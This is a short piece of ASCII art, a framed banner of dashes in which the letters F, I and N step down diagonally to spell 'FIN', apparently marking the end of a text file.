X---------------------------------------------------------------------------X
X--------------------------------F------------------------------------------X
X---------------------------------I-----------------------------------------X
X----------------------------------N----------------------------------------X
